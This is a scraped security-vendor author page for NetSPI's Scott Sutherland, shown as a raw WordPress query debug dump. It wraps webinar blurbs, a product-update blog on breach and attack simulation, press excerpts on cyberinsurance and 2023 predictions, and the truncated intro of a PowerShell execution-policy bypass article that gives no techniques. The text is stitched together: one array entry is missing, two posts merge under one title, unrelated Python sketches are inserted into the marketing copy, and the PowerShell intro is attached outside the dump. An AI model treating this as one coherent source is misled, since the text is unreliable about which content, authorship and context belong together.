Scott Sutherland

Below are links to some of his published material:

Presentations

https://www.slideshare.net/nullbind

Recent Open-Source Projects

https://github.com/NetSPI/PowerUpSQL

https://github.com/NetSPI/Powerhuntshares

https://github.com/NetSPI/Powerhunt

WP_Query Object

(

[query] => Array

(

[post_type] => Array

(

[0] => post

[1] => webinars

)

[posts_per_page] => -1

[post_status] => publish

[meta_query] => Array

(

[relation] => OR

[0] => Array

(

[key] => new_authors

[value] => "17"

[compare] => LIKE

)

[1] => Array

(

[key] => new_presenters

[value] => "17"

[compare] => LIKE

)

)

)

[query_vars] => Array

(

[post_type] => Array

(

[0] => post

[1] => webinars

)

[posts_per_page] => -1

[post_status] => publish

[meta_query] => Array

(

[relation] => OR

[0] => Array

(

[key] => new_authors

[value] => "17"

[compare] => LIKE

)

[1] => Array

(

[key] => new_presenters

[value] => "17"

[compare] => LIKE

)

)

[error] =>

[m] =>

[p] => 0

[post_parent] =>

[subpost] =>

[subpost_id] =>

[attachment] =>

[attachment_id] => 0

[name] =>

[pagename] =>

[page_id] => 0

[second] =>

[minute] =>

[hour] =>

[day] => 0

[monthnum] => 0

[year] => 0

[w] => 0

[category_name] =>

[tag] =>

[cat] =>

[tag_id] =>

[author] =>

[author_name] =>

[feed] =>

[tb] =>

[paged] => 0

[meta_key] =>

[meta_value] =>

[preview] =>

[s] =>

[sentence] =>

[title] =>

[fields] =>

[menu_order] =>

[embed] =>

[category__in] => Array

(

)

[category__not_in] => Array

(

)

[category__and] => Array

(

)

[post__in] => Array

(

)

[post__not_in] => Array

(

)

[post_name__in] => Array

(

)

[tag__in] => Array

(

)

[tag__not_in] => Array

(

)

[tag__and] => Array

(

)

[tag_slug__in] => Array

(

)

[tag_slug__and] => Array

(

)

[post_parent__in] => Array

(

)

[post_parent__not_in] => Array

(

)

[author__in] => Array

(

)

[author__not_in] => Array

(

)

[search_columns] => Array

(

)

[ignore_sticky_posts] =>

[suppress_filters] =>

[cache_results] => 1

[update_post_term_cache] => 1

[update_menu_item_cache] =>

[lazy_load_term_meta] => 1

[update_post_meta_cache] => 1

[nopaging] => 1

[comments_per_page] => 50

[no_found_rows] =>

[order] => DESC

)

[tax_query] => WP_Tax_Query Object

(

[queries] => Array

(

)

[relation] => AND

[table_aliases:protected] => Array

(

)

[queried_terms] => Array

(

)

[primary_table] => wp_posts

[primary_id_column] => ID

)

[meta_query] => WP_Meta_Query Object

(

[queries] => Array

(

[0] => Array

(

[key] => new_authors

[value] => "17"

[compare] => LIKE

)

[1] => Array

(

[key] => new_presenters

[value] => "17"

[compare] => LIKE

)

[relation] => OR

)

[relation] => OR

[meta_table] => wp_postmeta

[meta_id_column] => post_id

[primary_table] => wp_posts

[primary_id_column] => ID

[table_aliases:protected] => Array

(

[0] => wp_postmeta

)

[clauses:protected] => Array

(

[wp_postmeta] => Array

(

[key] => new_authors

[value] => "17"

[compare] => LIKE

[compare_key] => =

[alias] => wp_postmeta

[cast] => CHAR

)

[wp_postmeta-1] => Array

(

[key] => new_presenters

[value] => "17"

[compare] => LIKE

[compare_key] => =

[alias] => wp_postmeta

[cast] => CHAR

)

)

[has_or_relation:protected] => 1

)

[date_query] =>

[request] => SELECT wp_posts.ID

FROM wp_posts INNER JOIN wp_postmeta ON ( wp_posts.ID = wp_postmeta.post_id )

WHERE 1=1 AND (

( wp_postmeta.meta_key = 'new_authors' AND wp_postmeta.meta_value LIKE '{3e62ae006cbca7f48a2ef6baef656dc1e78ab9794f220451085a4a95de9718c4}\"17\"{3e62ae006cbca7f48a2ef6baef656dc1e78ab9794f220451085a4a95de9718c4}' )

OR

( wp_postmeta.meta_key = 'new_presenters' AND wp_postmeta.meta_value LIKE '{3e62ae006cbca7f48a2ef6baef656dc1e78ab9794f220451085a4a95de9718c4}\"17\"{3e62ae006cbca7f48a2ef6baef656dc1e78ab9794f220451085a4a95de9718c4}' )

) AND wp_posts.post_type IN ('post', 'webinars') AND ((wp_posts.post_status = 'publish'))

GROUP BY wp_posts.ID

ORDER BY wp_posts.post_date DESC

[posts] => Array

(

[0] => WP_Post Object

(

[ID] => 31578

[post_author] => 53

[post_date] => 2023-11-16 13:15:03

[post_date_gmt] => 2023-11-16 19:15:03

[post_content] =>

Watch Now

In this livestream, we explore the challenges of ransomware readiness and how AI can be your knight in shining armor. NetSPI's VP of Research, Scott Sutherland, takes us through a unique three-phased approach to combat ransomware:

- Phase 1: Breach and Attack Simulation

- Phase 2: IR Tabletop

- Phase 3: Custom Runbooks

Are you ready to equip yourself with the knowledge and tools to combat one of our most significant cybersecurity threats?

[wonderplugin_video iframe="https://youtu.be/qX4ysXWJBno" lightbox=0 lightboxsize=1 lightboxwidth=1200 lightboxheight=674.999999999999916 autoopen=0 autoopendelay=0 autoclose=0 lightboxtitle="" lightboxgroup="" lightboxshownavigation=0 showimage="" lightboxoptions="" videowidth=1200 videoheight=674.999999999999916 keepaspectratio=1 autoplay=0 loop=0 videocss="position:relative;display:block;background-color:#000;overflow:hidden;max-width:100%;margin:0 auto;" playbutton="https://www.netspi.com/wp-content/plugins/wonderplugin-video-embed/engine/playvideo-64-64-0.png"]

[post_title] => The Adversary is Using Artificial Intelligence. Why Aren’t You?

[post_excerpt] =>

[post_status] => publish

[comment_status] => closed

[ping_status] => closed

[post_password] =>

[post_name] => the-adversary-is-using-artificial-intelligence-why-arent-you

[to_ping] =>

[pinged] =>

[post_modified] => 2023-12-06 13:15:56

[post_modified_gmt] => 2023-12-06 19:15:56

[post_content_filtered] =>

[post_parent] => 0

[guid] => https://www.netspi.com/?post_type=webinars&p=31578

[menu_order] => 5

[post_type] => webinars

[post_mime_type] =>

[comment_count] => 0

[filter] => raw

)

[1] => WP_Post Object

(

[ID] => 29856

[post_author] => 53

[post_date] => 2023-03-07 16:16:05

[post_date_gmt] => 2023-03-07 22:16:05

[post_content] =>

In this video, NetSPI Vice President of Research Scott Sutherland provides a deep-dive demo of NetSPI’s Breach and Attack Simulation (BAS) tool. See our centralized detective control validation platform in action and learn how it gives companies the ability to create and execute custom procedures using proven technology and expert human penetration testers.

Ready to continuously simulate real-world attack behaviors, not just IoCs, and put your detective controls to the test in a way no other organization can? See BAS in action or schedule a 1:1 meeting with the NetSPI BAS team to get started.

Table of Contents

00:00 Introduction

Scott Sutherland explains market trends and gaps that led to the development of NetSPI’s Breach and Attack Simulation.

02:09 Vocabulary

Learn key concepts such as Procedure, Play, Playbook, Operation, and Agent, to set the stage for the rest of the video, ensuring that no matter your detective control experience, you understand the benefits and use cases of NetSPI’s Breach and Attack Simulation.

05:17 The Landing Page

Learn what it looks like when you first log in to NetSPI’s Breach and Attack Simulation platform. Clearly see summary information about your company’s detective control levels, what agents are active, what operations have recently been completed, and more.

Scott explains the most used features on this screen:

- Download Profile or Download Agent – Designed to make it easy to get started by completing downloads with a single click through our SaaS offering.

- Create Operation – Allowing you to learn what you have executed and measure detection levels throughout your organization.

- View Results – Jump back into the operation you last ran to view findings and pick up where you left off.

07:09 Play Execution









Learn how to execute a play using NetSPI’s Breach and Attack Simulation. We make it simple by organizing plays and procedures by MITRE ATT&CK phase, showing you each individual procedure, technique, when it was last run, and associated visibility levels.

Here, we also explain how to execute and automate plays within the platform.

11:58 Workspace

The Workspace is the main place where analysts and engineers will spend their time. Learn how NetSPI’s Breach and Attack Simulation is designed to enable and educate SOC teams by providing visibility levels, descriptions, business impact, verification instructions, detection improvement guidance, supporting resources, and more for each play within the MITRE ATT&CK framework.

The Activity Log feature centralizes project status, communications, and reporting between your teams.

Tags provide SOC teams the answer to the question, “Why does this matter?” by showing the Threat Actor, Tools, and Malware that use this specific attack.

Finally, data is organized within dynamic charts that update in real time, allowing your team to understand moment-in-time detection levels. These charts can also be exported for reporting purposes.

18:47 Timeline

Learn how the Timeline dashboard allows you to measure the effectiveness of detective controls over time and calculate return-on-investment over customizable time periods. Prove the value that investments, staffing, or process changes are delivering.

21:23 Heatmap

Learn how NetSPI’s Breach and Attack Simulation platform maps detection coverage to each phase of the cyber kill chain for each tactic or technique within the MITRE ATT&CK framework.

24:28 Operations

Learn how to customize the scope, procedures, plays, playbooks and reporting within an operation.

26:09 Create & Update

Learn how to create and edit operations for specific use cases, such as simulating specific threat behavior, running subsets or categories of procedures and plays, or targeting specific techniques or procedures that you or your organization are concerned about.

32:25 Playbooks

Learn how to create playbooks within NetSPI’s Breach and Attack Simulation platform.

[post_title] => BAS In Action: NetSPI’s Breach and Attack Simulation Demo

[post_excerpt] =>

[post_status] => publish

[comment_status] => closed

[ping_status] => closed

[post_password] =>

[post_name] => breach-and-attack-simulation-demo

[to_ping] =>

[pinged] =>

[post_modified] => 2023-09-21 14:02:23

[post_modified_gmt] => 2023-09-21 19:02:23

[post_content_filtered] =>

[post_parent] => 0

[guid] => https://www.netspi.com/?post_type=webinars&p=29856

[menu_order] => 31

[post_type] => webinars

[post_mime_type] =>

[comment_count] => 0

[filter] => raw

)

[2] => WP_Post Object

(

[ID] => 29689

[post_author] => 53

[post_date] => 2023-03-07 13:01:26

[post_date_gmt] => 2023-03-07 19:01:26

[post_content] =>

Watch Now



Many companies test to see if malicious actors can gain access to their environment or steal their valuable information; however, most security professionals don’t know if they would be able to detect adversaries once they are already inside. In fact, only 20% of common attack behaviors are caught by out-of-the-box EDR, MSSP, and SIEM solutions.

Join Scott Sutherland, NetSPI's Vice President of Research, and SANS Institute's John Pescatore for a discussion on how Breach and Attack Simulation (BAS) is a critical piece of security team success at any organization.

You’ll gain valuable insights into:

- Key BAS market trends.

- Critical discoveries from years of testing.

- Noteworthy feedback from security team leaders.

Finally, you will learn how these findings have impacted the development of NetSPI’s latest Breach and Attack Simulation updates, which launched earlier this year, empowering security professionals to efficiently evaluate their detective controls, educate their SOC teams, and execute on actionable intelligence!

[wonderplugin_video iframe="https://youtu.be/6Oy7FTX2WsQ" lightbox=0 lightboxsize=1 lightboxwidth=1200 lightboxheight=674.999999999999916 autoopen=0 autoopendelay=0 autoclose=0 lightboxtitle="" lightboxgroup="" lightboxshownavigation=0 showimage="" lightboxoptions="" videowidth=1200 videoheight=674.999999999999916 keepaspectratio=1 autoplay=0 loop=0 videocss="position:relative;display:block;background-color:#000;overflow:hidden;max-width:100%;margin:0 auto;" playbutton="https://www.netspi.com/wp-content/plugins/wonderplugin-video-embed/engine/playvideo-64-64-0.png"]

[post_title] => Breach and Attack Simulation & Security Team Success

[post_excerpt] =>

[post_status] => publish

[comment_status] => closed

[ping_status] => closed

[post_password] =>

[post_name] => breach-and-attack-simulation-security-team-success

[to_ping] =>

[pinged] =>

[post_modified] => 2023-03-28 12:55:34

[post_modified_gmt] => 2023-03-28 17:55:34

[post_content_filtered] =>

[post_parent] => 0

[guid] => https://www.netspi.com/?post_type=webinars&p=29689

[menu_order] => 33

[post_type] => webinars

[post_mime_type] =>

[comment_count] => 0

[filter] => raw

)

[3] => WP_Post Object

(

[ID] => 29338

[post_author] => 17

[post_date] => 2023-02-07 09:00:00

[post_date_gmt] => 2023-02-07 15:00:00

[post_content] =>

NetSPI prides itself on maintaining a leadership position in the global offensive security space by listening to client feedback, analyzing industry trends, and investing in breakthrough technology developments.

Over the last few months, our development teams have been busy, and are excited to introduce a variety of new features and capabilities across our Breach and Attack Simulation, Attack Surface Management, and Penetration Testing as a Service (PTaaS) solutions to help organizations improve security posture, streamline remediation, and protect themselves from adversaries.

Of the releases across our solutions portfolio, Breach and Attack Simulation (BAS) received the most significant updates, so let's start there.

Breach and Attack Simulation (BAS)

NetSPI BAS data shows that only 20% of common attack behaviors are detected by traditional EDR, SIEM, and MSSP solutions. Although most companies spend thousands, even millions, of dollars on detective controls, very few test to validate if they work and provide the value they claim to.

NetSPI’s Breach and Attack Simulation is designed to evaluate detective control effectiveness and educate security operations teams around common TTPs across the cyber kill chain. After many invaluable feedback sessions with NetSPI clients and hours of market research, we are excited to unveil major updates to our Breach and Attack Simulation platform, dialing in on three core dashboards: the Workspace, Timeline, and Heat Map dashboards.

Workspace

The Workspace is where red teams, purple teams, security engineers, and analysts will spend a majority of their time. Here, they can build, configure and run customized procedures to test their detective controls. Key features within the Workspace include:

- Utilize preconfigured procedures – or customize your own – to put detective controls to the test

- Visualize security posture and identify gaps using detailed summary charts that update in real time. These can be saved and downloaded to easily share with SOC teams and executive leadership to highlight gaps and justify budget for new staff and technology.



- While in the Workspace, users can also learn about each detection phase (logged, detected, alerted, responded, and prevented) for common TTPs within the MITRE ATT&CK framework – down to the individual procedure level.

- The Activity Log feature allows security teams to ditch the spreadsheets, wiki pages, and notepads they currently use to track information around their detective control capabilities and centralize this information from a summary viewpoint down to the findings level, allowing streamlined communication and remediation. It will also automatically log play execution and visibility state changes.

- Tags allow security teams to see the number of malware and threat actors that use the specific technique, helping prioritize resources and remediation efforts. Tags can also be leveraged to generate custom playbooks that include procedures used by unique threat actors, allowing security teams to measure their resiliency to specific threats quickly and easily.

- Export test results in JSON or CSV, allowing the SOC team to plug information into existing business processes and products, or develop customized metrics.

In summary, the Workspace is designed to educate and enable security teams to understand common attack procedures, how to detect them, and provide resources where they can learn more.

Timeline

While the Workspace shows a lot of great information, it focuses on a single point in time. The Timeline dashboard, however, allows you to measure detective controls over time.

This allows security teams to prove the value of investments in people, processes, or technology. The Timeline dashboard will also show where things have improved, stayed the same, or gotten worse at any stage of the MITRE ATT&CK kill chain.

While many competitive BAS offerings will show what is being alerted on, a unique differentiator for NetSPI is the ability to filter results and show changes in what is logged, detected, alerted, responded, and prevented. These changes can be shown as a percentage (e.g., logging improved 5 percent) or a count (e.g., logging improved within two different procedures). As in the Workspace, these charts can be downloaded and easily inserted into presentations, emails, or other reports as needed.
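To make the percentage-versus-count distinction concrete, here is a minimal sketch. The snapshot structure, procedure names, and function names are all hypothetical and are not taken from NetSPI's platform; the sketch only assumes that each procedure records which visibility levels it reached at two points in time.

```python
from typing import Dict, Set

PHASES = ("logged", "detected", "alerted", "responded", "prevented")

# Hypothetical snapshot format: procedure name -> visibility levels reached.
Snapshot = Dict[str, Set[str]]


def phase_counts(snapshot: Snapshot) -> Dict[str, int]:
    """Count how many procedures reached each visibility level."""
    return {
        phase: sum(1 for levels in snapshot.values() if phase in levels)
        for phase in PHASES
    }


def phase_changes(before: Snapshot, after: Snapshot) -> Dict[str, Dict[str, float]]:
    """Report the change per level as a procedure count and in percentage points.

    Assumes both snapshots are non-empty.
    """
    before_counts = phase_counts(before)
    after_counts = phase_counts(after)
    changes = {}
    for phase in PHASES:
        before_pct = 100.0 * before_counts[phase] / len(before)
        after_pct = 100.0 * after_counts[phase] / len(after)
        changes[phase] = {
            "count": after_counts[phase] - before_counts[phase],
            "percentage_points": after_pct - before_pct,
        }
    return changes


# Illustrative data only: four made-up procedures measured twice.
q1 = {
    "proc-a": {"logged"},
    "proc-b": {"logged", "detected"},
    "proc-c": set(),
    "proc-d": set(),
}
q2 = {
    "proc-a": {"logged", "detected"},
    "proc-b": {"logged", "detected", "alerted"},
    "proc-c": {"logged"},
    "proc-d": set(),
}

changes = phase_changes(q1, q2)
print(changes["logged"])
```

In this made-up data, logging coverage moves from two of four procedures to three of four, which can be reported either as one additional procedure or as a 25 percentage point improvement.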

For additional information on how NetSPI defines logging, detection, alerting, response, and prevention, read How to Paint a Comprehensive Threat Detection Landscape.

Heat Map

Security teams often refer to the MITRE ATT&CK framework, which shows the phases, tactics, or techniques of common TTPs and procedures seen in the wild. We know that many teams prefer seeing results in this framework, and as such, have built it into our Breach and Attack Simulation platform. BAS delivers a familiar way to interact with the data, while still connecting to the Workspace created for detection engineers and other security team members.

As mentioned in the Timeline section, a key differentiator is that we show the different visibility levels (logged, detected, alerted, responded, and prevented) for MITRE ATT&CK framework coverage, within each phase of the cyber kill chain and down to each specific technique.

Here, we also have the ability to dig in and show all of the procedures that are supported within each technique category. These are then cross-linked back to the Workspace, to streamline remediation and re-testing of specific coverage gaps.

This is a quick summary of a few new features and benefits included in our updated Breach and Attack Simulation solution. If you would like to learn more, we encourage you to read our release notes, or contact us for a demo.

Attack Surface Management (ASM)

Attack Surface Management continues to be a major focus and growing technology within the cybersecurity industry. NetSPI’s most recent ASM updates focus on organizing, filtering, and expanding on information that was previously included, making it even easier to locate and act on.

Three key new feature highlights from last quarter include Vulnerability Triggers, Certificate Transparency Logs, and the Subdomain Facet within our domain explore page.

Vulnerability Triggers

First off, what is a vulnerability? Vulnerabilities consist of any exploits of significant risk identified on your attack surface, which are found by combining both assets and exposures. Although a specific asset or exposure might not be very impactful, when combined into a series of steps it can result in a much greater risk.

With the recent introduction of Vulnerability Triggers, admins can now query assets and exposures for specific criteria based on preconfigured or customized search results, and alert on the ones that are the most concerning to you or your company. These Vulnerability Triggers can now be customized to search for criteria related to Domains, IPs, or Ports.

Long story short, Vulnerability Triggers allow your company to search not only for common assets, exploits, and vulnerabilities, but also for key areas of concern for your executive team, industry, organization, or project.

Certificate Transparency Logs & Subdomain Facet

The next two new features are focused on root domain and subdomain discovery.

NetSPI’s ASM has searched root domains and subdomains since its creation; however, we are proud to officially introduce Certificate Transparency Logs! We now ingest certificate transparency logs from public data sources, allowing us to significantly increase domain discovery.

We are also excited to announce the release of our Subdomain Facet within our domain explore page. It is common for companies to have tens, or even hundreds, of subdomains on their attack surface. With the Subdomain Facet, you can now filter the common subdomains on your attack surface.

A good use case is discovering development subdomains (dev.netspi.com, stage.netspi.com, prod.netspi.com, etc.) where sensitive projects or intellectual property might be located and unintentionally exposed externally.

Another common use case for these types of features could be to detect subdomains that have been hijacked by malicious adversaries in an attempt to steal sensitive customer or employee information.

This is a quick summary of a few new features and benefits included in our Attack Surface Management offering. If you would like to learn more, we encourage you to read our release notes, or contact us for a demo.
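The subdomain filtering idea described above can be sketched roughly as follows. This is not NetSPI's implementation: the hostnames, the `example.com` root domain, and the function names are hypothetical, and the sketch assumes a facet is simply the label that sits directly beneath the root domain.

```python
from collections import Counter
from typing import Iterable, List


def subdomain_label(hostname: str, root_domain: str) -> str:
    """Return the label directly under the root domain, or "" if there is none."""
    hostname = hostname.lower().rstrip(".")
    root = root_domain.lower()
    if hostname == root or not hostname.endswith("." + root):
        return ""
    prefix = hostname[: -(len(root) + 1)]  # e.g. "api.dev" for api.dev.example.com
    return prefix.split(".")[-1]


def facet_counts(hostnames: Iterable[str], root_domain: str) -> Counter:
    """Count how often each subdomain label appears (the facet values)."""
    labels = (subdomain_label(h, root_domain) for h in hostnames)
    return Counter(label for label in labels if label)


def filter_by_labels(
    hostnames: Iterable[str], root_domain: str, labels: Iterable[str]
) -> List[str]:
    """Keep only hostnames whose facet label is in the requested set."""
    wanted = set(labels)
    return [h for h in hostnames if subdomain_label(h, root_domain) in wanted]


# Illustrative inventory only; none of these hosts come from the article.
hosts = [
    "dev.example.com",
    "stage.example.com",
    "www.example.com",
    "api.dev.example.com",
    "example.com",
    "dev.example.org",
]

counts = facet_counts(hosts, "example.com")
non_prod = filter_by_labels(hosts, "example.com", {"dev", "stage"})
print(counts)
print(non_prod)
```

Grouping by the label nearest the root keeps nested hosts such as `api.dev.example.com` in the same `dev` bucket, which is one reasonable way to surface development environments; a real product may facet differently.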

Penetration Testing as a Service (Resolve™)

NetSPI’s Resolve, our penetration testing as a service (PTaaS) platform, has been an industry leader for years, allowing users to visualize their test results and streamline remediation by up to 40%. This product would not be able to remain a leader without continued updates from our product development teams.

Recently, we have been focused on delivering updates that enhance the user experience and make data within the platform more accessible and easier to leverage within other security team processes and platforms.

AND/OR Logic

Previously, when users created filters in the grid, either AND logic or OR logic could be applied to filtered search results, but not both together. We are excited to introduce AND/OR Logic to filters, allowing users to combine AND logic and OR logic to deliver more detailed results to their security teams or business leaders.
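As a rough illustration of what combining AND and OR logic in a single filter means, the sketch below evaluates a nested condition over a few made-up finding records. The field names (`severity`, `status`, `asset`) and helper functions are hypothetical and do not reflect Resolve's actual filter API.

```python
from typing import Any, Callable, Dict

Finding = Dict[str, Any]
Predicate = Callable[[Finding], bool]


def field_equals(field: str, value: Any) -> Predicate:
    """Build a predicate that checks one field for an exact value."""
    return lambda finding: finding.get(field) == value


def all_of(*predicates: Predicate) -> Predicate:
    """AND: every predicate must match."""
    return lambda finding: all(p(finding) for p in predicates)


def any_of(*predicates: Predicate) -> Predicate:
    """OR: at least one predicate must match."""
    return lambda finding: any(p(finding) for p in predicates)


# Illustrative records only.
findings = [
    {"id": 1, "severity": "critical", "status": "open", "asset": "web"},
    {"id": 2, "severity": "high", "status": "open", "asset": "db"},
    {"id": 3, "severity": "critical", "status": "closed", "asset": "web"},
    {"id": 4, "severity": "low", "status": "open", "asset": "web"},
]

# (severity is critical OR severity is high) AND status is open
combined = all_of(
    any_of(field_equals("severity", "critical"), field_equals("severity", "high")),
    field_equals("status", "open"),
)

matching_ids = [f["id"] for f in findings if combined(f)]
print(matching_ids)
```

Because `all_of` and `any_of` both return predicates, they can be nested to any depth, which is the property that a flat AND-only or OR-only filter lacks.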

Automated Instance State Workflow

Finally, we have introduced automated instance state workflows to include bulk edits. Previously, this was only applicable while updating individual instance states. This change improves efficiencies within the Resolve platform for entire vulnerability management teams.

This is a quick summary of a few new features and benefits included in our PTaaS solution. If you would like to learn more, we encourage you to read our release notes, or contact us for a demo.

This blog post is a part of our offensive security solutions update series. Stay tuned for additional innovations within Resolve (PTaaS), ASM (Attack Surface Management), and BAS (Breach and Attack Simulation).

Read past solutions update blogs:

On January 31, NetSPI's Scott Sutherland, VP of Research, and Norman Kromberg, CISO, were featured in the SecurityWeek article called Cyber Insights 2023: Cyberinsurance. Read the preview below or view it online.

+++

SecurityWeek Cyber Insights 2023 | Cyberinsurance – Cyberinsurance emerged into the mainstream in 2020. In 2021 it found its sums were wrong over ransomware and it had to increase premiums dramatically. In 2022, Russia invaded Ukraine with the potential for more serious and more costly global nation state cyberattacks – and Lloyd’s of London announced a stronger and clearer war exclusions clause.

Higher premiums and wider exclusions are the primary methods for insurance to balance its books – and it is already having to use both. The question for 2023 and beyond is whether the cyberinsurance industry can make a profit without destroying its market. But one thing is certain: a mainstream, funds rich business like insurance will not easily relinquish a market from which it can profit.

It has a third tool, which has not yet been fully unleashed: prerequisites for cover.

The Lloyd’s war exclusion clause and other difficulties

The Lloyd’s exclusion clause dates to the NotPetya incident of 2017. In some cases, insurers refused to pay out on related claims. Josephine Wolff, an associate professor of cybersecurity policy at Fletcher, Tufts, has written a history of cyberinsurance titled Cyberinsurance Policy: Rethinking Risk in an Age of Ransomware, Computer Fraud, Data Breaches, and Cyberattacks.

“Merck and Mondelez, sued their insurers for denying claims related to the attack on the grounds that it was excluded from coverage as a hostile or warlike action because it was perpetrated by a national government,” she explains. However, an initial ruling in late 2021, unsealed in January 2022, indicated that if insurers wanted to exclude state-sponsored attacks from their coverage they must write exclusions stating that explicitly, rather than relying on boilerplate war exclusions. Merck was granted summary judgment on its claim for $1.4 billion.

The Russia/Ukraine kinetic war has caused a massively increased expectation of nation state-inspired cyberattacks against Europe, the US, NATO, and other west-leaning nations. Lloyd’s rapidly responded with an expanded, but cyberinsurance-centric, war exclusion clause excluding state-sponsored cyberattacks that will kick in from March 2023.

Insurers’ response

2023 is a watershed moment for cyberinsurance. It will not abandon what promises to be a massive market – but clearly it cannot continue with its makeshift approach of simply increasing both premiums and exclusions to balance the books indefinitely.

Nevertheless, the expansion of ‘prerequisites’ would be a major – and probably inevitable – evolution in the development of cyberinsurance. Cyberinsurance began as a relatively simple gap-filler. The industry recognized that standard business insurance didn’t explicitly cover against cyber risks, and cyberinsurance evolved to fill that gap. In the beginning, there was no intention to impose cybersecurity conditions on the insured, beyond perhaps a few non-specific basics such as having MFA installed.

But now, comments Scott Sutherland, VP of research at NetSPI, “Insurance company security testing standards will evolve.” It’s been done before, and PCI DSS is the classic example. The payment card industry, explains Sutherland, “observed the personal/business risk associated with insufficient security controls and the key stakeholders combined forces to build policies, standards, and testing procedures that could help reduce that risk in a manageable way for their respective industries.”

He continued, “My guess and hope for 2023, is that the major cyber insurance companies start talking about developing a unified standard for qualifying for cyber insurance. Hopefully, that will bring more qualified security testers into that market which can help drive down the price of assessments and reduce the guesswork/risk being taken on by the cyber insurance companies. While there are undoubtedly more cyber insurance companies than card brands, I think it would work in the best interest of the major players to start serious discussions around the issue and potential solutions.”

There is no silver bullet for cybersecurity. Breaches will continue and will continue to rise in cost and severity – and the insurance industry will continue to balance its books through increasing premiums, exclusions, and insurance refusals. The best that can be hoped for from insurers increasing security requirements is that, as Norman Kromberg, CISO at NetSPI suggests, “Cyber Insurance will become a leading driver for investment in security and IT controls.”

You can read the full article at Security Week!

[post_title] => SecurityWeek: Cyber Insights 2023: Cyberinsurance

[post_excerpt] => NetSPI Scott Sutherland, VP of Research, and Norman Kromberg, CISO, were featured in the SecurityWeek article called Cyber Insights 2023: Cyberinsurance.

[post_status] => publish

[comment_status] => closed

[ping_status] => closed

[post_password] =>

[post_name] => securityweek-cyber-insights-2023-cyberinsurance

[to_ping] =>

[pinged] =>

[post_modified] => 2023-02-07 16:12:38

[post_modified_gmt] => 2023-02-07 22:12:38

[post_content_filtered] =>

[post_parent] => 0

[guid] => https://www.netspi.com/?p=29342

[menu_order] => 154

[post_type] => post

[post_mime_type] =>

[comment_count] => 0

[filter] => raw

)

[5] => WP_Post Object

(

[ID] => 29189

[post_author] => 17

[post_date] => 2023-01-11 09:00:00

[post_date_gmt] => 2023-01-11 15:00:00

[post_content] =>

On January 11, NetSPI VP of Research Scott Sutherland was featured in the Help Net Security article called 4 Key Shifts in the Breach and Attack Simulation (BAS) Market. Read the preview below or view it online.

+++

The increase in the number of attack surfaces along with the rise in cybercriminal sophistication is generating technical debt for security operations centers (SOCs), many of which are understaffed and unable to dedicate time to effectively manage the growing number of security tools in their environment.

Yet, regardless of these challenges, SOC teams are tasked to continuously evolve and adapt to defend against emerging, sophisticated threats.

There are several major players in the BAS market that promise continuous automated security control validation. Many can replicate specific attacker behavior and integrate with your telemetry stack to verify that the behavior was observed, generated an alert, and was blocked.

But as the BAS market continues to evolve, there’s also an opportunity to address shortcomings. In the new year, we expect to see several incremental improvements to BAS solutions, with these four themes leading the charge.

More Streamlined Product Deployment to Reduce Costs

Many fully automated security control validation solutions include hidden costs. First, they require up-front configuration for their on-site deployments, which may also require customizations to ensure everything works properly with the integrations. Additionally, BAS solutions need to be proactively maintained, and for enterprise environments this often requires dedicated staff.

As a result, we’ll see BAS vendors work harder to streamline their product deployments to help reduce the overhead cost for their customers through methods such as providing more SaaS-based offerings.

You can read the full article at Help Net Security!

[post_title] => Help Net Security: 4 Key Shifts in the Breach and Attack Simulation (BAS) Market

[post_excerpt] => On January 11, NetSPI VP of Research Scott Sutherland was featured in the Help Net Security article called 4 Key Shifts in the Breach and Attack Simulation (BAS) Market.

[post_status] => publish

[comment_status] => closed

[ping_status] => closed

[post_password] =>

[post_name] => 4-key-shifts-in-the-breach-and-attack-simulation-bas-market

[to_ping] =>

[pinged] =>

[post_modified] => 2023-01-23 15:09:55

[post_modified_gmt] => 2023-01-23 21:09:55

[post_content_filtered] =>

[post_parent] => 0

[guid] => https://www.netspi.com/?p=29189

[menu_order] => 163

[post_type] => post

[post_mime_type] =>

[comment_count] => 0

[filter] => raw

)

[6] => WP_Post Object

(

[ID] => 29117

[post_author] => 17

[post_date] => 2022-12-29 09:00:00

[post_date_gmt] => 2022-12-29 15:00:00

[post_content] =>

On December 29, NetSPI's Scott Sutherland and Nick Landers were featured in the Enterprise Security Tech article called 2023 Cybersecurity Predictions: Major Financial Institutions Will Turn To Blockchain. Read the preview below or view it online.

+++

Scott Sutherland, VP of Research, NetSPI

Can DLT Help Stop Software Supply Chain Attacks?

Adoption of distributed ledger technology (DLT) is still in its infancy and we’ll see some interesting use cases gain momentum in 2023. DLT can basically be used as a database that enforces security through cryptographic keys and signatures. Since the stored data is immutable, DLT can be used anytime you need a high integrity source of truth. That comes in handy when trying to ensure the security of open-source projects (and maybe some commercial ones). Over the last few years, there have been several “supply chain compromises” that boil down to an unauthorized code submission. In response to those attacks, many software providers have started to bake more security reviews and audit controls into their SDLC process. Additionally, the companies consuming software have beefed up their requirements for adopting/deploying third-party software in their environment. However, neither really solves the core issue, which is that anyone with administrative access to the systems hosting the code repository can bypass the intended controls. DLT could be a solution to that problem.

Nick Landers, VP of Research, NetSPI

By the end of next year every major financial institution will have announced adoption of Blockchain technology.

There is a notable trend of Blockchain adoption in large financial institutions. The primary focus is custodial offerings of digital assets, and private chains to maintain and execute trading contracts. The business use cases for Blockchain technology will deviate starkly from popularized tokens and NFTs. Instead, industries will prioritize private chains to accelerate business logic, digital asset ownership on behalf of customers, and institutional investment in Proof of Stake chains.

By the end of next year, I would expect every major financial institution will have announced adoption of Blockchain technology, if they haven’t already. Nuanced technologies like Hyperledger Fabric have received much less security research than Ethereum, EVM, and Solidity-based smart contracts. Additionally, the supported features in business-focused private chain technologies differ significantly from their public counterparts. This ultimately means more attack surface, more potential configuration mistakes, and more required training for development teams. If you thought that blockchain was “secure by default”, think again. Just like cloud platform adoption, the promises of “secure by default” will fall away as unique attack paths and vulnerabilities are discovered in the nuances of this tech.

You can read the full article at Enterprise Security Tech!







By default PowerShell is configured to prevent the execution of PowerShell scripts on Windows systems. This can be a hurdle for penetration testers, sysadmins, and developers, but it doesn't have to be. In this blog I'll cover 15 ways to bypass the PowerShell execution policy without having local administrator rights on the system. I'm sure there are many techniques that I've missed (or simply don't know about), but hopefully this cheat sheet will offer a good start for those who need it.



What is the PowerShell Execution Policy?

